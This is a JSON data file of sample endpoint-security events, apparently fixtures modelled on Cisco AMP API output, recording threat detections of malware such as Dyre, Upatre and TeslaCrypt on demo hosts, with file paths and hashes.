+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":257000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":240000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669405052633000,"timestamp":1610705998,"timestamp_nanoseconds":847000000,"date":"2021-01-15T10:19:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669405052633129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":375000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595368","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":360000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669143059628000,"timestamp":1610705937,"timestamp_nanoseconds":968000000,"date":"2021-01-15T10:18:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669143059628070","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259286289613000,"timestamp":1610705905,"timestamp_nanoseconds":669000000,"date":"2021-01-15T10:18:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259286289612895","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259234750005000,"timestamp":1610705893,"timestamp_nanoseconds":657000000,"date":"2021-01-15T10:18:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259234750005342","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259183210398000,"timestamp":1610705881,"timestamp_nanoseconds":645000000,"date":"2021-01-15T10:18:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259183210397789","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180335966167761000,"timestamp":1610705878,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:17:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180335966167760897","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":653000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251520740131000,"timestamp":1610705860,"timestamp_nanoseconds":3000000,"date":"2021-01-15T10:17:40+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251520740130915","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163618","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163617","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163616","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163615","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163613","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} 